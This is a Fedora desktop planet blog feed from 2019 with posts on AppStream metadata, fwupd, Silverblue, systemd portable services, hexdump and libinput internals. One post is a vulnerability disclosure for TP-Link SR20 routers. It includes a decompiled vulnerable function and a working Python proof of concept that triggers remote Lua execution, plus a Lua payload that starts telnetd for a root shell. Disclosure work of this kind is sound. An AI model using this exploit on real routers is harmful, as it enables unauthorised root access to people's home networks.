Fedora desktop Planet

Remember the extra metadata if you change a desktop ID!

Posted by Richard Hughes on April 23, 2019 11:48 AM

This is important if you’re the upstream maintainer of an application: If you change the desktop ID then it’s like breaking API. Changing a desktop ID should be done carefully and in a development branch only — and then you need to communicate it and give the distros a chance to adapt to the new name.

If you’re just changing the desktop ID and not forking development, you also need to add something like this in your metainfo.xml file:

  <provides>
    <id>old-name.desktop</id>
  </provides>

GNOME Software gets lots of bugs about showing “duplicate” search results, but there’s no reliable way it can know that calibre-gui.desktop is the same app as com.calibre_ebook.calibre without some help. If you’re a packager building an application for something like Flathub you only need to include the extra provides line if you’re adding a new metainfo.xml file rather than just using rename-appdata-file in the JSON file.
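As an illustration of why that extra tag matters, here is a rough sketch (not GNOME Software's actual code) of how a client could check that a renamed component still declares its old desktop ID; the file name and IDs below are just examples:

import xml.etree.ElementTree as ET

def provides_old_id(metainfo_path, old_desktop_id):
    """Return True if the metainfo file lists old_desktop_id under <provides>."""
    root = ET.parse(metainfo_path).getroot()
    return any(elem.text == old_desktop_id
               for elem in root.findall("./provides/id"))

# Hypothetical example for the rename mentioned above:
print(provides_old_id("com.calibre_ebook.calibre.metainfo.xml", "calibre-gui.desktop"))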

Using a client certificate to set the attestation checksum

Posted by Richard Hughes on April 10, 2019 08:02 PM

For a while, fwupd has been able to verify the PCR0 checksum for the system firmware. The attestation checksum can be used to verify that the installed firmware matches that supplied by the vendor and means the end user is confident the firmware has not been modified by a 3rd party. I think this is really an important and useful thing the LVFS can provide. The PCR0 value can easily be found using tpm2_pcrlist if the TPM is in v2.0 mode, or cat /sys/class/tpm/tpm0/pcrs if the TPM is still in v1.2 mode. It is also reported in the fwupdmgr get-devices output for versions of fwupd >= 1.2.2.
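If you want to read the value from a script rather than from the fwupd output, a minimal sketch for the TPM 1.2 case might look like this (it assumes the usual “PCR-00: aa bb …” line format of the sysfs file):

def tpm12_pcr0(pcrs_path="/sys/class/tpm/tpm0/pcrs"):
    """Parse PCR0 out of the TPM 1.2 sysfs file (line format assumed, see above)."""
    with open(pcrs_path) as f:
        for line in f:
            if line.startswith("PCR-00:"):
                return line.split(":", 1)[1].replace(" ", "").strip().lower()
    return None

print(tpm12_pcr0())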

The device checksum as a PCR0 is slightly different than a device checksum for a typical firmware. For instance, a DFU device checksum can be created using sha256sum firmware.bin (assuming the image is 100% filling the device) and you don’t actually have to flash the image to the hardware to get the device checksum out. For a UEFI UpdateCapsule you need to schedule the update, reboot, then read back the PCR0 from the hardware. There must be an easier way…

Assuming you have a vendor account on the LVFS, first upload the client certificate for your user account to the LVFS:

Then, assuming you’re using fwupd >= 1.2.6 you can now do this:

fwupdmgr refresh
fwupdmgr update
…reboot…
fwupdmgr report-history --sign

Notice the --sign there? Looking back at the LVFS, there now exists a device checksum:

This means the firmware gets the magic extra green tick that makes everyone feel a lot happier:

Developer tool for i18n: “Pseudolocale”

Posted by Bastien Nocera on April 06, 2019 10:41 AM
While browsing for some internationalisation/localisation features, I found an interesting piece of functionality in Android's developer documentation. I'll quote it here:
A pseudolocale is a locale that is designed to simulate characteristics of languages that cause UI, layout, and other translation-related problems when an app is translated.
I've now implemented this for applications and libraries that use gettext, as an LD_PRELOAD library, available from this repository.


The current implementation can highlight a number of potential problems (paraphrasing the Android documentation again):
- String concatenation, which displays as one message split across 2 or more brackets.
- Hard-coded strings, which cannot be sent to translation, display as unaccented text in the pseudolocale to make them easy to notice.
- Right-to-left (RTL) problems such as elements not being mirrored.
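The real thing is an LD_PRELOAD library wrapping gettext, but the transformation itself is easy to picture; here is a toy sketch of the idea (the accent map and bracket style are made up for illustration):

# Toy pseudolocalisation: accent every translated string and wrap it in
# brackets so concatenated fragments and hard-coded strings stand out.
ACCENTS = str.maketrans("aeiouAEIOU", "àéîõüÀÉÎÕÜ")

def pseudolocalise(message):
    return "[" + message.translate(ACCENTS) + "]"

# A concatenated UI string shows up as two bracketed fragments:
print(pseudolocalise("You have ") + pseudolocalise("3 new messages"))
# Hard-coded strings never go through gettext, so they stay unaccented.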

Our old friend, Office Runner 


Testing brought some unexpected results :)

Silverblue at 1

Posted by Matthias Clasen on April 03, 2019 05:53 PM

It has been a bit more than a year since we set up the Atomic Workstation SIG. A little later, we settled on the name Silverblue, and did a preview release with Fedora 29.

The recent F30 beta release is a good opportunity to look back. What have we achieved?

When we set out to turn Atomic Workstation into an every-day-usable desktop, we had a list of items that we knew needed to be addressed. As it turns out, we have solved most of them, or are very close to that.

Here is an unsorted list.

Full Flatpak support

GNOME Software already had support for installing Flatpaks a year ago, so this is not 100% new. But the support has been greatly improved with the port to libflatpak – GNOME Software is now using the same code as the Flatpak commandline. And more recently, it learned to display information about sandbox permissions, so that users can see what level of system access the installed applications have.

This information is now also available in the new Application Settings panel. The panel also offers some control over permissions and lets you clean up storage per application.

A Flatpak registry

Flathub is a great place to find desktop applications – there are over 500 now. But since we can’t enable Flathub by default, we have looked for an alternative, and started to provide Flatpak apps in the Fedora container registry. This is taking advantage of Flatpak’s support for the OCI format, and uses the Fedora module-build-system.

GNOME Software support for rpm-ostree

GNOME Software was designed as an application installer, but it also provides the UI for OS updates and upgrades. On a Silverblue system, that means supporting rpm-ostree. GNOME Software has learned to do this.

Another bit of functionality for which GNOME Software was traditionally talking to PackageKit is Addons. These are things that could be classified as system extensions: fonts, language support, shell extensions, etc. On a Silverblue system, the direct replacement is to use the rpm-ostree layering capability to add such packages to the OS image. GNOME Software knows how to do this now. It is not ideal, since you probably don’t expect to have to reboot your system for installing a font. But it gets us the basic functionality back until we have better solutions for system extensions.

Nvidia driver support

One class of system extensions that I haven’t mentioned in the previous section is drivers. If you have an Nvidia graphics card, you may want the Nvidia driver to make best use of your hardware. The situation with the Nvidia drivers is a little more complicated than with plain rpms, since the rpm needs to match your kernel, and if you don’t have the right driver, your system may boot to a black screen.

These complications are not unique to Silverblue, and the traditional solution for this in Fedora is to use the akmod system to build drivers that match your kernel. With Fedora 30, we put the necessary changes in place in rpm-ostree and the OS image to make this work for Silverblue as well.

Third-party rpms

Fedora contains a lot of apps, but there’s always the odd one that you can’t find in the repositories. A popular app in this category is the Chrome browser. Thankfully, Google provides an rpm that works on Fedora. But, it installs its content into /opt. That is not technically wrong, but causes a problem on Silverblue, since rpm-ostree has so far insisted on keeping packaged content under its tight control in /usr.

Ultimately, we want to see apps shipped as Flatpaks, but for Fedora 30, we have managed to get rpm-ostree to handle this situation, so Chrome and similar 3rd party rpms can now be installed via package layering on Silverblue.

A toolbox

An important target audience for Fedora Workstation is developers. Not being able to install toolchains and libraries (because the OS is immutable) is obviously not going to make this audience happy.

The short answer is: switch to container-based workflows. It’s the future!

But that doesn’t excuse us from making these workflows easy and convenient for people who are used to the power of the commandline. So, we had to come up with a better answer, and started to develop the toolbox. The toolbox is a commandline tool to take the pain out of working with ‘pet’ containers. With a single command,

toolbox enter

it gives you a ‘traditional’ Fedora environment with dnf,  where you can install the packages you need. The toolbox has the infrastructure to manage multiple named containers, so you can work on different projects in parallel without interference.

What’s missing?

There are many bigger and smaller things that can still be improved – software is never finished. To name just a few:

  • Make IDEs work well with containers on an immutable OS
  • Codec availability and installation
  • Handle “difficult” applications such as virtualbox well
  • Find better ways to handle system extensions

But we’ve come a long way in the one year since I started using Atomic Workstation as my day-to-day OS.

If you want to see for yourself, download the F30 beta image and give it a try!

Walkthrough for Portable Services in Go

Posted by Lennart Poettering on April 02, 2019 10:00 PM

Portable Services Walkthrough (Go Edition)

A few months ago I posted a blog story with a walkthrough of systemd Portable Services. The example service given was written in C, and the image was built with mkosi. In this blog story I'd like to revisit the exercise, but this time focus on a different aspect: modern programming languages like Go and Rust push users a lot more towards static linking of libraries than the usual dynamic linking preferred by C (at least in the way C is used by traditional Linux distributions).

Static linking means we can greatly simplify image building: if we don't have to link against shared libraries during runtime we don't have to include them in the portable service image. And that means pretty much all need for building an image from a Linux distribution of some kind goes away as we'll have next to no dependencies that would require us to rely on a distribution package manager or distribution packages. In fact, as it turns out, we only need as few as three files in the portable service image to be fully functional.

So, let's have a closer look how such an image can be put together. All of the following is available in this git repository.

A Simple Go Service

Let's start with a simple Go service, an HTTP service that simply counts how often a page from it is requested. Here are the sources: main.go — note that I am not a seasoned Go programmer, hence please be gracious.

The service implements systemd's socket activation protocol, and thus can receive bound TCP listener sockets from systemd, using the $LISTEN_PID and $LISTEN_FDS environment variables.

The service will store the counter data in the directory indicated in the $STATE_DIRECTORY environment variable, which happens to be an environment variable current systemd versions set based on the StateDirectory= setting in service files.
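The service itself is written in Go (see main.go in the repository), but the protocol is language-agnostic. As a rough illustration only, here is how the same two pieces could be picked up in Python, assuming a single IPv4 stream socket is passed (systemd starts numbering passed file descriptors at 3):

import os
import socket

LISTEN_FDS_START = 3  # first fd passed by systemd socket activation

def get_activated_socket():
    """Pick up the listener socket handed over by systemd."""
    if os.environ.get("LISTEN_PID") != str(os.getpid()):
        raise RuntimeError("not socket activated")
    if int(os.environ.get("LISTEN_FDS", "0")) < 1:
        raise RuntimeError("no sockets passed")
    # assuming an IPv4 TCP socket here, purely for illustration
    return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
                         fileno=LISTEN_FDS_START)

def bump_counter():
    """Persist the visitor counter below the directory systemd provides."""
    path = os.path.join(os.environ["STATE_DIRECTORY"], "counter")
    count = int(open(path).read()) + 1 if os.path.exists(path) else 1
    with open(path, "w") as f:
        f.write(str(count))
    return count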

Two Simple Unit Files

When a service shall be managed by systemd a unit file is required. Since the service we are putting together shall be socket activatable, we even have two: portable-walkthrough-go.service (the description of the service binary itself) and portable-walkthrough-go.socket (the description of the sockets to listen on for the service).

These units are not particularly remarkable: the .service file primarily contains the command line to invoke and a StateDirectory= setting to make sure the service when invoked gets its own private state directory under /var/lib/ (and the $STATE_DIRECTORY environment variable is set to the resulting path). The .socket file simply lists 8080 as TCP/IP port to listen on.

An OS Description File

OS images (and that includes portable service images) generally should include an os-release file. Usually, that is provided by the distribution. Since we are building an image without any distribution let's write our own version of such a file. Later on we can use the portablectl inspect command to have a look at this metadata of our image.

Putting it All Together

The four files described above are already every file we need to build our image. Let's now put the portable service image together. For that I've written a Makefile. It contains two relevant rules: the first one builds the static binary from the Go program sources. The second one then puts together a squashfs file system combining the following:

  1. The compiled, statically linked service binary
  2. The two systemd unit files
  3. The os-release file
  4. A couple of empty directories such as /proc/, /sys/, /dev/ and so on that need to be over-mounted with the respective kernel API file system. We need to create them as empty directories here since Linux insists on directories to exist in order to over-mount them, and since the image we are building is going to be an immutable read-only image (squashfs) these directories cannot be created dynamically when the portable image is mounted.
  5. Two empty files /etc/resolv.conf and /etc/machine-id that can be over-mounted with the same files from the host.

And that's already it. After a quick make we'll have our portable service image portable-walkthrough-go.raw and are ready to go.

Trying it out

Let's now attach the portable service image to our host system:

# portablectl attach ./portable-walkthrough-go.raw
(Matching unit files with prefix 'portable-walkthrough-go'.)
Created directory /etc/systemd/system.attached.
Created directory /etc/systemd/system.attached/portable-walkthrough-go.socket.d.
Written /etc/systemd/system.attached/portable-walkthrough-go.socket.d/20-portable.conf.
Copied /etc/systemd/system.attached/portable-walkthrough-go.socket.
Created directory /etc/systemd/system.attached/portable-walkthrough-go.service.d.
Written /etc/systemd/system.attached/portable-walkthrough-go.service.d/20-portable.conf.
Created symlink /etc/systemd/system.attached/portable-walkthrough-go.service.d/10-profile.conf → /usr/lib/systemd/portable/profile/default/service.conf.
Copied /etc/systemd/system.attached/portable-walkthrough-go.service.
Created symlink /etc/portables/portable-walkthrough-go.raw → /home/lennart/projects/portable-walkthrough-go/portable-walkthrough-go.raw.

The portable service image is now attached to the host, which means we can now go and start it (or even enable it):

# systemctl start portable-walkthrough-go.socket

Let's see if our little web service works, by doing an HTTP request on port 8080:

# curl localhost:8080
Hello! You are visitor #1!

Let's try this again, to check if it counts correctly:

# curl localhost:8080
Hello! You are visitor #2!

Nice! It worked. Let's now stop the service again, and detach the image again:

# systemctl stop portable-walkthrough-go.service portable-walkthrough-go.socket
# portablectl detach portable-walkthrough-go
Removed /etc/systemd/system.attached/portable-walkthrough-go.service.
Removed /etc/systemd/system.attached/portable-walkthrough-go.service.d/10-profile.conf.
Removed /etc/systemd/system.attached/portable-walkthrough-go.service.d/20-portable.conf.
Removed /etc/systemd/system.attached/portable-walkthrough-go.service.d.
Removed /etc/systemd/system.attached/portable-walkthrough-go.socket.
Removed /etc/systemd/system.attached/portable-walkthrough-go.socket.d/20-portable.conf.
Removed /etc/systemd/system.attached/portable-walkthrough-go.socket.d.
Removed /etc/portables/portable-walkthrough-go.raw.
Removed /etc/systemd/system.attached.

And there we go, the portable image file is detached from the host again.

A Couple of Notes

  1. Of course, this is a simplistic example: in real life services will be more than one compiled file, even when statically linked. But you get the idea, and it's very easy to extend the example above to include any additional, auxiliary files in the portable service image.

  2. The service is very nicely sandboxed during runtime: while it runs as regular service on the host (and you thus can watch its logs or do resource management on it like you would do for all other systemd services), it runs in a very restricted environment under a dynamically assigned UID that ceases to exist when the service is stopped again.

  3. Originally I wanted to make the service not only socket activatable but also implement exit-on-idle, i.e. add logic so that the service terminates on its own when there's no ongoing HTTP connection for a while. I couldn't figure out how to do this race-freely in Go, but I am sure an interested reader might want to add that? By combining socket activation with exit-on-idle we can turn this project into an exercise of putting together an extremely resource-friendly and robust service architecture: the service is started only when needed and terminates when no longer needed. This would allow packing services at a much higher density even on systems with few resources.

  4. While the basic concepts of portable services have been around since systemd 239, it's best to try the above with systemd 241 or newer since the portable service logic received a number of fixes since then.

Further Reading

A low-level document introducing Portable Services is shipped along with systemd.

Please have a look at the blog story from a few months ago that did something very similar with a service written in C.

There are also relevant manual pages: portablectl(1) and systemd-portabled(8).

Remote code execution as root from the local network on TP-Link SR20 routers

Posted by Matthew Garrett on March 28, 2019 10:18 PM
The TP-Link SR20[1] is a combination Zigbee/ZWave hub and router, with a touchscreen for configuration and control. Firmware binaries are available here. If you download one and run it through binwalk, one of the things you find is an executable called tddp. Running arm-linux-gnu-nm -D against it shows that it imports popen(), which is generally a bad sign - popen() passes its argument directly to the shell, so if there's any way to get user controlled input into a popen() call you're basically guaranteed victory. That flagged it as something worth looking at, but in the end what I found was far funnier.

Tddp is the TP-Link Device Debug Protocol. It runs on most TP-Link devices in one form or another, but different devices have different functionality. What is common is the protocol, which has been previously described. The interesting thing is that while version 2 of the protocol is authenticated and requires knowledge of the admin password on the router, version 1 is unauthenticated.

Dumping tddp into Ghidra makes it pretty easy to find a function that calls recvfrom(), the call that copies information from a network socket. It looks at the first byte of the packet and uses this to determine which protocol is in use, and passes the packet on to a different dispatcher depending on the protocol version. For version 1, the dispatcher just looks at the second byte of the packet and calls a different function depending on its value. 0x31 is CMD_FTEST_CONFIG, and this is where things get super fun.

Here's a cut down decompilation of the function:
int ftest_config(char *byte) {
  int lua_State;
  char *remote_address;
  int err;
  int luaerr;
  char filename[64];
  char configFile[64];
  char luaFile[64];
  int attempts;
  char *payload;

  attempts = 4;
  memset(luaFile,0,0x40);
  memset(configFile,0,0x40);
  memset(filename,0,0x40);
  lua_State = luaL_newstart();
  payload = iParm1 + 0xb027;
  if (payload != 0x00) {
    sscanf(payload,"%[^;];%s",luaFile,configFile);
    if ((luaFile[0] == 0) || (configFile[0] == 0)) {
      printf("[%s():%d] luaFile or configFile len error.\n","tddp_cmd_configSet",0x22b);
    }
    else {
      remote_address = inet_ntoa(*(in_addr *)(iParm1 + 4));
      tddp_execCmd("cd /tmp;tftp -gr %s %s &",luaFile,remote_address);
      sprintf(filename,"/tmp/%s",luaFile);
      while (0 < attempts) {
        sleep(1);
        err = access(filename,0);
        if (err == 0) break;
        attempts = attempts + -1;
      }
      if (attempts == 0) {
        printf("[%s():%d] lua file [%s] don\'t exsit.\n","tddp_cmd_configSet",0x23e,filename);
      }
      else {
        if (lua_State != 0) {
          luaL_openlibs(lua_State);
          luaerr = luaL_loadfile(lua_State,filename);
          if (luaerr == 0) {
            luaerr = lua_pcall(lua_State,0,0xffffffff,0);
          }
          lua_getfield(lua_State,0xffffd8ee,"config_test",luaerr);
          lua_pushstring(lua_State,configFile);
          lua_pushstring(lua_State,remote_address);
          lua_call(lua_State,2,1);
        }
        lua_close(lua_State);
      }
    }
  }
}
Basically, this function parses the packet for a payload containing two strings separated by a semicolon. The first string is a filename, the second a configfile. It then calls tddp_execCmd("cd /tmp; tftp -gr %s %s &",luaFile,remote_address) which executes the tftp command in the background. This connects back to the machine that sent the command and attempts to download a file via tftp corresponding to the filename it sent. The main tddp process waits up to 4 seconds for the file to appear - once it does, it loads the file into a Lua interpreter it initialised earlier, and calls the function config_test() with the name of the config file and the remote address as arguments. Since config_test() is provided by the file that was downloaded from the remote machine, this gives arbitrary code execution in the interpreter, which includes the os.execute method which just runs commands on the host. Since tddp is running as root, you get arbitrary command execution as root.

I reported this to TP-Link in December via their security disclosure form, a process that was made difficult by the "Detailed description" field being limited to 500 characters. The page informed me that I'd hear back within three business days - a couple of weeks later, with no response, I tweeted at them asking for a contact and heard nothing back. Someone else's attempt to report tddp vulnerabilities had a similar outcome, so here we are.

There are a couple of morals here:
  • Don't default to running debug daemons on production firmware seriously how hard is this
  • If you're going to have a security disclosure form, read it


Proof of concept:
#!/usr/bin/python3

# Copyright 2019 Google LLC.
# SPDX-License-Identifier: Apache-2.0
 
# Create a file in your tftp directory with the following contents:
#
#function config_test(config)
#  os.execute("telnetd -l /bin/login.sh")
#end
#
# Execute script as poc.py remoteaddr filename
 
import binascii
import socket
import sys
 
port_send = 1040
port_receive = 61000
 
tddp_ver = "01"
tddp_command = "31"
tddp_req = "01"
tddp_reply = "00"
tddp_padding = "%0.16X" % 00
 
tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])
 
sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_receive.bind(('', port_receive))
 
# Send a request
sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = binascii.unhexlify(tddp_packet)
argument = "%s;arbitrary" % sys.argv[2]
packet = packet + argument.encode()
sock_send.sendto(packet, (sys.argv[1], port_send))
sock_send.close()
 
response, addr = sock_receive.recvfrom(1024)
r = response.hex()
print(r)

[1] Link to the wayback machine because the live link now redirects to an Amazon product page for a lightswitch


New AppStream Validation Requirements

Posted by Richard Hughes on March 28, 2019 04:27 PM

In the next release of appstream-glib the appstream-util validate requirements got changed, which might make your life easier, or harder — depending on whether you already pass or fail the validation. The details are here but the rough gist is that we’ve relaxed a lot of the style rules (e.g. starts with a capital letter, ends with a full stop, less than a certain number of chars, etc), and made stricter some of the more important optional parts of the specification. For instance, requiring <content_rating> for any desktop or console application.

Even if you don’t care upstream, the new validation will soon be turned on for any apps built in Flathub, and downstream “packagers” will be pestering you for details as updates are now failing. Although only a few apps fail, some of the missing metadata tags are important enough to fail building. To test your app right now with the new validator:

$ flatpak remote-add --if-not-exists gnome-nightly https://sdk.gnome.org/gnome-nightly.flatpakrepo
$ flatpak install gnome-nightly org.gnome.Sdk
$ flatpak run --command=bash --filesystem=home:ro org.gnome.Sdk//master
# appstream-util validate /home/hughsie/Code/gnome-software/data/appdata/org.gnome.Software.appdata.xml.in
# exit

Of course, when the next tarball is released it’ll be available in your distribution as normal, but I wanted to get some early sanity checks in before I tag the release.

The LVFS is now a Linux Foundation project

Posted by Richard Hughes on March 28, 2019 02:19 PM

The LVFS is now an official Linux Foundation project! I did a mini-interview if you want some more details about where the project came from and where it’s heading. I’m hoping the move to the Linux Foundation gives the project a lot more credibility with existing LF members, and it certainly takes some of the load from me. I’ll continue to develop the lvfs-website codebase as before, and still be the friendly face when talking to OEMs and ODMs.

In the short term, not much changes, although you might start to see some rebranding of the website itself. The server is also moving from a little VM in AMS to a fully scalable orchestrated thing maintained by people who actually understand how to be a sysadmin. If you’re interested in what’s happening on the LVFS, be sure to join the announcement mailing list. We’re averaging about 450,000 firmware downloads a month, and still growing steadily, with more and more vendors joining every month.

In related news, there’s lots of new firmware on the LVFS, much of it addressing serious CVEs on lots of different laptop models. If you’ve not updated recently, now is the time to fix that.

Even more fun with SuperIO

Posted by Richard Hughes on March 25, 2019 11:35 AM

My fun with SuperIO continues, and may be at the logical end. I’ve now added the required code to the superio plugin to flash IT89xx embedded controllers. Most of the work was working out how to talk to the hardware on ports 0x62 and 0x66, although the flash “commands” are helpfully JEDEC compliant. The actual flashing process is the typical:

  • Enter into a bootloader mode (which disables your keyboard, fans and battery reporting)
  • Mark the internal EEPROM as writable
  • Erase blocks of data
  • Write blocks of data to the device
  • Read back the blocks of data to verify the write
  • Mark the internal EEPROM as read-only
  • Return to runtime mode

There were a few slight hiccups, in that when you read the data back from the device just one byte is predictably wrong, but nothing that can’t be worked around in software. Working around the wrong byte means we can verify the attestation checksum correctly.
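The overall loop is nothing exotic; here is a purely conceptual sketch (the device object and its methods are stand-ins for the real port 0x62/0x66 commands in the superio plugin, and the block size is made up):

BLOCK_SIZE = 0x400  # made-up block size, for illustration only

def flash_ec(device, firmware):
    """Erase, write and verify the firmware image block by block."""
    device.enter_bootloader()          # keyboard, fans, battery reporting stop here
    device.set_eeprom_writable(True)
    try:
        for offset in range(0, len(firmware), BLOCK_SIZE):
            block = firmware[offset:offset + BLOCK_SIZE]
            device.erase_block(offset)
            device.write_block(offset, block)
            # this is also where a known-bad readback byte could be masked out
            if device.read_block(offset, len(block)) != block:
                raise IOError("verify failed at offset %#x" % offset)
    finally:
        device.set_eeprom_writable(False)
        device.return_to_runtime()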

Now, don’t try flashing your EC with random binaries. The binaries look unsigned, don’t appear to have any kind of checksum, and flashing the wrong binary to the wrong hardware has the failure mode of “no I/O devices appear at boot” so unless you have a hardware programmer handy it’s probably best to wait for an update from your OEM.

We also do the EC update from a special offline-update mode where nothing other than fwupd is running, much like we do the system updates in Fedora. All this work was supported by the people at Star Labs, and now basically everything in the LapTop Mk3 is updatable in Linux. EC updates for Star Labs hardware should appear on the LVFS soon.

Using hexdump to print binary protocols

Posted by Peter Hutterer on March 21, 2019 12:30 AM

I had to work on an image yesterday where I couldn't install anything and the amount of pre-installed tools was quite limited. And I needed to debug an input device, usually done with libinput record. So eventually I found that hexdump supports formatting of the input bytes but it took me a while to figure out the right combination. The various resources online only got me partway there. So here's an explanation which should get you to your results quickly.

By default, hexdump prints identical input lines as a single line with an asterisk ('*'). To avoid this, use the -v flag as in the examples below.

hexdump's format string is a single-quote-enclosed string that contains the count, the element size and a double-quote-enclosed printf-like format string. So a simple example is this:


$ hexdump -v -e '1/2 "%d\n"' <filename>
-11643
23698
0
0
-5013
6
0
0
This prints 1 element ('iteration') of 2 bytes as integer, followed by a linebreak. Or in other words: it takes two bytes, converts them to an int and prints it. If you want to print the same input value in multiple formats, use multiple -e invocations.

$ hexdump -v -e '1/2 "%d "' -e '1/2 "%x\n"' <filename>
-11568 d2d0
23698 5c92
0 0
0 0
6355 18d3
1 1
0 0
This prints the same 2-byte input value, once as decimal signed integer, once as lowercase hex. If we have multiple identical things to print, we can do this:

$ hexdump -v -e '2/2 "%6d "' -e '" hex:"' -e '4/1 " %x"' -e '"\n"' <filename>
-10922 23698 hex: 56 d5 92 5c
0 0 hex: 0 0 0 0
14879 1 hex: 1f 3a 1 0
0 0 hex: 0 0 0 0
0 0 hex: 0 0 0 0
0 0 hex: 0 0 0 0
Which prints two elements, each size 2 as integers, then the same elements as four 1-byte hex values, followed by a linebreak. %6d is a standard printf instruction and documented in the manual.

Let's go and print our protocol. The struct representing the protocol is this one:


struct input_event {
#if (__BITS_PER_LONG != 32 || !defined(__USE_TIME_BITS64)) && !defined(__KERNEL__)
struct timeval time;
#define input_event_sec time.tv_sec
#define input_event_usec time.tv_usec
#else
__kernel_ulong_t __sec;
#if defined(__sparc__) && defined(__arch64__)
unsigned int __usec;
#else
__kernel_ulong_t __usec;
#endif
#define input_event_sec __sec
#define input_event_usec __usec
#endif
__u16 type;
__u16 code;
__s32 value;
};
So we have two longs for sec and usec, two shorts for type and code and one signed 32-bit int. Let's print it:

$ hexdump -v -e '"E: " 1/8 "%u." 1/8 "%06u" 2/2 " %04x" 1/4 "%5d\n"' /dev/input/event22
E: 1553127085.097503 0002 0000 1
E: 1553127085.097503 0002 0001 -1
E: 1553127085.097503 0000 0000 0
E: 1553127085.097542 0002 0001 -2
E: 1553127085.097542 0000 0000 0
E: 1553127085.108741 0002 0001 -4
E: 1553127085.108741 0000 0000 0
E: 1553127085.118211 0002 0000 2
E: 1553127085.118211 0002 0001 -10
E: 1553127085.118211 0000 0000 0
E: 1553127085.128245 0002 0000 1
And voila, we have our structs printed in the same format evemu-record prints out. So with nothing but hexdump, I can generate output I can then parse with my existing scripts on another box.
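For comparison, once you do have a proper environment again, the same structs are easy to unpack in a few lines of Python; the 'llHHi' layout below assumes a 64-bit machine where struct timeval is two longs, and the device node is just an example:

import struct

# struct input_event on 64-bit: struct timeval (two longs), __u16 type,
# __u16 code, __s32 value -- 24 bytes in total.
EVENT_FORMAT = "llHHi"
EVENT_SIZE = struct.calcsize(EVENT_FORMAT)

with open("/dev/input/event22", "rb") as f:  # example device node
    while True:
        data = f.read(EVENT_SIZE)
        if len(data) < EVENT_SIZE:
            break
        sec, usec, ev_type, code, value = struct.unpack(EVENT_FORMAT, data)
        print("E: %d.%06d %04x %04x %5d" % (sec, usec, ev_type, code, value))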

libinput's internal building blocks

Posted by Peter Hutterer on March 15, 2019 06:15 AM

Ho ho ho, let's write libinput. No, of course I'm not serious, because no-one in their right mind would utter "ho ho ho" without a sufficient backdrop of reindeers to keep them sane. So what this post is instead is me writing a nonworking fake libinput in Python, for the sole purpose of explaining roughly what libinput's architecture looks like. It'll be to the libinput what a Duplo car is to a Maserati. Four wheels and something to entertain the kids with but the queue outside the nightclub won't be impressed.

The target audience are those that need to hack on libinput and where the balance of understanding vs total confusion is still shifted towards the latter. So in order to make it easier to associate various bits, here's a description of the main building blocks.

libinput uses something resembling OOP except that in C you can't have nice things unless what you want is a buffer overflow\n\80xb1001af81a2b1101. Instead, we use opaque structs, each with accessor methods and an unhealthy amount of verbosity. Because Python does have classes, those structs are represented as classes below. This all won't be actual working Python code, I'm just using the syntax.

Let's get started. First of all, let's create our library interface.


class Libinput:
    @classmethod
    def path_create_context(cls):
        return _LibinputPathContext()

    @classmethod
    def udev_create_context(cls):
        return _LibinputUdevContext()

    # dispatch() means: read from all our internal fds and
    # call the dispatch method on anything that has changed
    def dispatch(self):
        for fd in self.epoll_fd.get_changed_fds():
            self.handlers[fd].dispatch()

    # return whatever the next event is
    def get_event(self):
        return self._events.pop(0)

    # the various _notify functions are internal API
    # to pass things up to the context
    def _notify_device_added(self, device):
        self._events.append(LibinputEventDevice(device))
        self._devices.append(device)

    def _notify_device_removed(self, device):
        self._events.append(LibinputEventDevice(device))
        self._devices.remove(device)

    def _notify_pointer_motion(self, x, y):
        self._events.append(LibinputEventPointer(x, y))


class _LibinputPathContext(Libinput):
    def add_device(self, device_node):
        device = LibinputDevice(device_node)
        self._notify_device_added(device)

    def remove_device(self, device_node):
        self._notify_device_removed(device)


class _LibinputUdevContext(Libinput):
    def __init__(self):
        self.udev = udev.context()

    def udev_assign_seat(self, seat_id):
        self.seat_id = seat_id

        for udev_device in self.udev.devices():
            device = LibinputDevice(udev_device.device_node)
            self._notify_device_added(device)


We have two different modes of initialisation, udev and path. The udev interface is used by Wayland compositors and adds all devices on the given udev seat. The path interface is used by the X.Org driver and adds only one specific device at a time. Both interfaces have the dispatch() and get_events() methods which is how every caller gets events out of libinput.

In both cases we create a libinput device from the data and create an event about the new device that bubbles up into the event queue.

But what really are events? Are they real or just a fidget spinner of our imagination? Well, they're just another object in libinput.


class LibinputEvent:
    @property
    def type(self):
        return self._type

    @property
    def context(self):
        return self._libinput

    @property
    def device(self):
        return self._device

    def get_pointer_event(self):
        if isinstance(self, LibinputEventPointer):
            return self  # This makes more sense in C where it's a typecast
        return None

    def get_keyboard_event(self):
        if isinstance(self, LibinputEventKeyboard):
            return self  # This makes more sense in C where it's a typecast
        return None


class LibinputEventPointer(LibinputEvent):
    @property
    def time(self):
        return self._time / 1000

    @property
    def time_usec(self):
        return self._time

    @property
    def dx(self):
        return self._dx

    @property
    def absolute_x(self):
        return self._x * self._x_units_per_mm

    @property
    def absolute_x_transformed(self, width):
        return self._x * width / self._x_max_value
You get the gist. Each event is actually an event of a subtype with a few common shared fields and a bunch of type-specific ones. The events often contain some internal value that is calculated on request. For example, the API for the absolute x/y values returns mm, but we store the value in device units instead and convert to mm on request.

So, what's a device then? Well, just another I-cant-believe-this-is-not-a-class with relatively few surprises:


class LibinputDevice:
    class Capability(Enum):
        CAP_KEYBOARD = 0
        CAP_POINTER = 1
        CAP_TOUCH = 2
        ...

    def __init__(self, device_node):
        pass  # no-one instantiates this directly

    @property
    def name(self):
        return self._name

    @property
    def context(self):
        return self._libinput_context

    @property
    def udev_device(self):
        return self._udev_device

    @property
    def has_capability(self, cap):
        return cap in self._capabilities

    ...
Now we have most of the frontend API in place and you start to see a pattern. This is how all of libinput's API works, you get some opaque read-only objects with a few getters and accessor functions.

Now let's figure out how to work on the backend. For that, we need something that handles events:


class EvdevDevice(LibinputDevice):
    def __init__(self, device_node):
        fd = open(device_node)
        super().context.add_fd_to_epoll(fd, self.dispatch)
        self.initialize_quirks()

    def has_quirk(self, quirk):
        return quirk in self.quirks

    def dispatch(self):
        while True:
            data = fd.read(input_event_byte_count)
            if not data:
                break

            self.interface.dispatch_one_event(data)

    def _configure(self):
        # some devices are adjusted for quirks before we
        # do anything with them
        if self.has_quirk(SOME_QUIRK_NAME):
            self.libevdev.disable(libevdev.EV_KEY.BTN_TOUCH)

        if 'ID_INPUT_TOUCHPAD' in self.udev_device.properties:
            self.interface = EvdevTouchpad()
